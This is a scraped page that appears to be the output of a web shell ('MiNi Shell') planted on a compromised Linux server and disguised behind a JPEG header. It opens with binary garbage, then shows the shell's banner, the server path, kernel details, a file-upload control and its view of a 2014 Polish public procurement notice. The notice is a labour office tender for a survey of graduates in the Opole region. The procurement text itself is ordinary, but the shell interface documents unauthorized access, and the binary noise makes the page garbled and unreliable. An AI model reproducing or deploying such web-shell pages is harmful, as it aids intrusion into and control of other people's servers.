JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140514/103715-N-2014.html

<p class="kh_header"><b>Opole: Realizacja badania społecznego pn. Badanie losów absolwentów szkół zawodowych i wyższych w województwie opolskim</b><br>
<b>Numer ogłoszenia: 103715 - 2014; data zamieszczenia: 14.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 0-77 4416701, faks 0-77 4416702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wup.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja badania społecznego pn. Badanie losów absolwentów szkół zawodowych i wyższych w województwie opolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja badania przeprowadzonego metodą ilościową wśród absolwentów ponadgimnazjalnych szkół zawodowych (zasadnicze szkoły zawodowe oraz technika) i wszystkich uczelni wyższych województwa opolskiego. 2. Zamawiający zastrzega sobie prawo uczestnictwa w konceptualizacji i operacjonalizacji w trakcie przygotowania do badań, a także formułowania wytycznych w aspekcie analizy uzyskanego materiału empirycznego. 3. Zamawiający nie dopuszcza jakiejkolwiek pomocy ze swojej strony w dotarciu do uczestników badania. 4. Celem badania jest poznanie i zdiagnozowanie sytuacji na rynku pracy w jakiej znajdują się absolwenci określonych typów szkół w pół roku po zakończeniu nauki, w porównaniu z ich sytuacją zawodową i edukacyjną tuż przed ukończeniem nauki. W szczególności określenie planów zawodowych i edukacyjnych oraz migracyjnych, a także oceny przydatności posiadanych kompetencji i kwalifikacji tuż przed opuszczeniem szkoły, a następnie konfrontacja tych planów z sytuacją absolwentów w pół roku po zakończeniu nauki oraz ponowna ocena przydatności posiadanych kwalifikacji i umiejętności nabytych w trakcie nauki szkolnej. 5. Badanie ma mieć charakter ilościowy z zastosowaniem metody kwestionariuszowej. Jako użyteczny kwestionariusz badania Zamawiający uzna kwestionariusz, w którym odsetek braku odpowiedzi na zadane pytania badawcze (zmienne) nie będzie większy niż 5 procent. 6. Założenia metodologiczne realizacji badania: 1) Badanie objęte niniejszym zamówieniem ma zostać przeprowadzone w formie badania panelowego. Badanie zostanie przeprowadzone w dwóch etapach: a) Etap pierwszy obejmuje badanie uczniów ostatnich klas szkół zawodowych (zasadniczych, techników) oraz studentów ostatnich lat studiów dziennych na uczelniach wyższych i ich filiach działających na terenie województwa opolskiego, które w roku akademickim 2013/2014 mają takich studentów oraz zebranie bazy danych kontaktowych wśród wszystkich respondentów.  b) Etap drugi obejmuje ponowne dotarcie do tych osób oraz przeprowadzenie badania w pięć miesięcy po zakończeniu nauki (liczonych od ostatniego dnia czerwca 2014 roku) na podstawie zebranej bazy danych adresowych. 2) Badaniem będącym przedmiotem zamówienia zostaną objęci: uczniowie ostatnich klas szkół ponadgimnazjalnych zawodowych dla młodzieży funkcjonujących na obszarze województwa opolskiego (zasadnicze szkoły zawodowe, technika) oraz studenci ostatnich lat studiów dziennych opolskich uczelni wskazanych w podpunkcie a. 3) Próba ma zostać dobrana metodą losowo-warstwową, gdzie warstwy stanowią: w przypadku uczniów szkół ponadgimnazjalnych typ szkoły (ZSZ, technikum) oraz powiat, w którym mieści się szkoła; w przypadku studentów: uczelnia wyższa oraz grupa kierunków studiów wg klasyfikacji GUS. 4) W przypadku studentów ostatnich lat studiów dziennych operatem losowania powinny być listy studentów na poszczególnych kierunkach. 5) Dobór próby musi spełniać następujące wymagania: maksymalna wartość błędu plus, minus 5 procent, przedział ufności 95 procent. 6) Wielkość próby musi wynosić co najmniej 1850 osób i umożliwiać wnioskowanie, przy założonych kryteriach (losowo warstwowy dobór próby, wartość błędu plus, minus 5 procent, przedział ufności 95 procent), w każdym etapie badania, na poziomie każdego typu szkoły zawodowej ponadgimnazjalnej oraz każdej szkoły wyższej, wskazanej w podpunkcie a. 7. Zagadnienia badawcze w ramach etapu pierwszego: 1) Plany zawodowe i,lub edukacyjne; 2) Plany migracyjne (migracje wewnętrzne i zewnętrzne); 3) Oczekiwania wobec przyszłego miejsca pracy i pracodawcy i, lub szkoły (płaca, rodzaj zatrudnienia, odległość od miejsca zamieszkania itp.); 4) Preferowany sektor, rodzaj przyszłego miejsca pracy i, lub rodzaj szkoły i kierunek nauki; 5) Ocena umiejętności i kwalifikacji zawodowych zdobytych w trakcie dotychczasowej nauki; 6) Dane metryczkowe. 8. Zagadnienia badawcze w ramach etapu drugiego: 1) Aktualna sytuacja zawodowa i, lub edukacyjna (w tym obecny status na rynku pracy, miejsce pracy i, lub nauki, zgodność wykonywanego zawodu z wyuczonym i, lub zgodność kierunku dalszego kształcenia z kierunkiem kształcenia dotychczasowego, wynagrodzenie, forma zatrudnienia itp.); 2) Aktualne miejsce pobytu i jego cel (praca, nauka, inne); 3) Ocena posiadanych umiejętności i kwalifikacji zawodowych w kontekście potrzeb rynku pracy (w tym dotychczasowa aktywność szkoleniowa oraz potrzeby szkoleniowe) i aktualnej sytuacji respondentów na rynku pracy; 4) Ocena wpływu wiedzy i umiejętności wyniesionych ze szkoły na znalezienie zatrudnienia w przypadku podjęcia pracy w okresie 5 miesięcy po zakończeniu nauki; 5) Sposób znalezienia pracy w przypadku jej podjęcia w okresie 5 miesięcy po zakończeniu nauki (poprzez znajomych, media, urząd pracy, biuro karier, po stażu, po szkoleniu itp.); 6) Rejestracja oraz korzystanie z form wsparcia oferowanych przez powiatowe urzędy pracy; 7) Dane metryczkowe. 9. W trakcie I etapu badania Wykonawca zobowiązany jest do zebrania bazy danych kontaktowych do respondentów takich jak adresy e-mail, które zostaną wykorzystane przy nawiązywaniu ponownych kontaktów z respondentami w II etapie oraz przez Zamawiającego w celu ewentualnej weryfikacji wyników. 10. W ramach realizacji niniejszego zamówienia Wykonawca jest zobowiązany do: 1) Opracowania teoretycznych podstaw badań; 2) Wylosowania próby zgodnie z założeniami opisanymi w punkcie 6 podpunkty 3-5; 3) Opracowania kwestionariusza wywiadu osobnego dla każdego etapu badania i z uwzględnieniem specyfiki badanych szkół; 4) Przed przystąpieniem do badań terenowych przedstawienia Zamawiającemu struktury wylosowanej próby oraz wzoru kwestionariuszy, o których mowa w podpunkcie 3); 5) Uzyskania akceptacji ze strony Zamawiającego dla materiałów opisanych w podpunkcie 4) oraz uwzględnienia wszelkich uwag ze strony Zamawiającego, jeżeli od nich zależeć będzie ta akceptacja; 6) Przeprowadzenia badania terenowego w dwóch etapach (etap I w miesiącu  czerwcu 2014 roku i etap II w miesiącu grudniu 2014 roku); 7) Przeprowadzenia analizy i interpretacji danych pozyskanych w trakcie realizacji badań, każdorazowo z uwzględnieniem płci respondentów (weryfikacja do ogółu respondentów i do poszczególnych płci), obejmującą analizę struktury (procentowe rozkłady odpowiedzi) oraz analizę korelacji pomiędzy zmiennymi niezależnymi, a wybranymi zmiennymi zależnymi wynikającymi z hipotez badawczych będących odpowiedziami na postawione pytania badawcze;  8) Opracowania po zakończeniu pierwszego etapu badania raportu cząstkowego zgodnego z opisem w punkcie 11 i 12  zawierającego analizę wyników i wnioski z badań w ramach etapu pierwszego, który dostarczy do dnia 29 sierpnia 2014 roku Zamawiającemu;  9) Po zakończeniu drugiego etapu badań opracowania raportu końcowego zgodnego z opisem w punkcie 11 i 12  zawierającego analizę wyników i  wnioski z badań w ramach obu etapów, który dostarczy Zamawiającemu w terminie do dnia 26 stycznia 2015 roku  wraz z projektem skrótu z badań, zwanego dalej folderem; 10) Uzyskania akceptacji ze strony Zamawiającego dla raportu wskazanego w podpunkcie 8) oraz raportu i folderu wskazanych w podpunkcie 9) oraz uwzględnienia wszelkich uwag ze strony Zamawiającego, jeżeli od nich zależeć będzie ta akceptacja; 11) Po uzyskaniu akceptacji raportu i folderu wskazanych w podpunkcie 9) dostarczenia Zamawiającemu projektu folderu (o objętości maksymalnie 16 stron z okładkami, w formacie A5) w formacie pdf. spełniającym wymogi druku w drukarni. Skład graficzny raportu podlega konsultacjom z Zamawiającym, a jego koszt powinien zostać wliczony w ogólny koszt realizacji usługi badawczej. 12) Dostarczenia Zamawiającemu wraz z raportem wskazanym w podpunkcie 9) procentowego zestawienia odpowiedzi poszczególnych pytań w odniesieniu do płci respondentów oraz danych przedstawiających analizę korelacji pomiędzy zmiennymi zależnymi i niezależnymi wraz z wyszczególnionymi współczynnikami korelacji i ich wartościami w wersji MS Excel (1 kopia nagrana na CD), a także bazę danych z zakodowanymi kwestionariuszami wraz z opisem zmiennych w formacie obsługiwanym przez program IBM SPSS Statistics; 12) Dostarczenia Zamawiającemu wraz z raportem wskazanym w podpunkcie 9) recenzji raportu opracowanej przez osobę wskazaną przez Wykonawcę w złożonej przez niego ofercie, posiadającą co najmniej tytuł naukowy doktora habilitowanego nauk społecznych. 11. Raporty opisane w punkcie 10 podpunktach 8) i 9) powinny mieć objętość maksimum 100 stron formatu A4 napisanego czcionką Times New Roman z interlinią 1,5, wydrukowanego i trwale spiętego w dwóch kopiach i nagranego na CD w formacie MS Word i Adobe Acrobat Reader. Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk.  12. Raport z badania ma składać się z następujących części: 1) wniosków (w raporcie z etapu I) oraz wniosków i rekomendacji płynących z badań (w raporcie z etapu II), 2) wstępu zawierającego skrócony opis badania (w raporcie z etapu I i II), 3) metodologii i realizacji badania, tj. opisu metodologii badania, opisu zastosowanych technik, opisu sposobu doboru i liczebności próby badawczej, opisu nadzoru i kontroli badań (w raporcie z I i II etapu badań), 4) rozdziałów merytorycznych zawierających analizy i interpretacje wyników pierwszego etapu badania (w raporcie z I etapu) oraz obu etapów badania terenowego (w raporcie z II etapu), a także zawierających przedstawienia wyników obu etapów badań w postaci tabel i wykresów dla każdego z pytań badawczych (wykresy i tabele powinny zostać wkomponowane w tekst analizy i interpretacji). 13. Wykonawca odpowiedzialny jest za obsługę techniczną zakresu prac wymienionych w punkcie 10. 14. Wykonawca jest zobowiązany do informowania respondentów o tym, iż uczestniczą w badaniach realizowanych w ramach Programu Operacyjnego Kapitał Ludzki i współfinansowanych przez Unię Europejską. 15. Wykonawca zobowiązany jest do umieszczenia na raportach, ankietach i innych elementach logotypów dostarczonych przez Zamawiającego. 16. Zamawiający zastrzega sobie prawo do przeprowadzenia kontroli u wybranych respondentów i wglądu w zrealizowane kwestionariusze na każdym etapie realizacji zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej dwie główne usługi badawcze, o wartości brutto nie mniejszej niż 50 000,00 złotych każda, wraz z załączeniem dowodów, czy usługi te zostały wykonane należycie. Pod pojęciem głównej usługi badawczej należy rozumieć usługę badawczą przeprowadzoną metodą ilościową w formie badania panelowego na próbie liczącej co najmniej 1200 osób w każdej fali panelu. Dowodami, o których mowa powyżej są poświadczenia lub oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia. W celu potwierdzenia spełnienia powyższego warunku Wykonawca jest zobowiązany załączyć do swojej oferty wykaz wykonanych głównych usług badawczych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie, sporządzonego według wzoru stanowiącego Załącznik nr 3 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że będzie dysponować co najmniej 1 (jedną) osobą, która posiada tytuł naukowy doktora habilitowanego nauk społecznych, i która będzie odpowiedzialna za sporządzenie recenzji raportu oraz co najmniej 2 (dwoma) członkami wchodzącymi w skład zespołu badawczego posiadającymi tytuł magistra. W celu potwierdzenia spełnienia powyższego warunku Wykonawca jest zobowiązany załączyć do swojej oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego według wzoru stanowiącego Załącznik nr 4 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - LICZEBNOŚĆ PRÓBY NA KTÓREJ ZOSTANIE PRZEPROWADZONE BADANIE - 50</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2014 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c - Kancelaria pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opolskie Obserwatorium Rynku Pracy III/Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com